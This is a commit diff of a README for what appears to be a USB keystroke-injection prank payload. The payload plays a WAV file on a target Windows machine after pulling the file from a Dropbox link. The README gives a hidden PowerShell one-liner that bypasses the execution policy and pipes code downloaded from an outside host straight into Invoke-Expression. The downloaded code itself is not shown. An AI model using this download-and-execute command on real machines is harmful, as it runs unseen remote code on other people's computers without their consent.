Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-20 17:48:40 -06:00 committed by GitHub
parent 1d6b5c4fd8
commit a79cbacacc
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -28,15 +28,16 @@ After one is the WAV file will be played.
### Dependencies ### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 10,11 * Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>
### Executing program ### Executing program
* Place the WAV Url in the $wav variable
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file * Invoke-WebRequest will be entered in the Run Box to download your WAV file
``` ```
powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
``` ```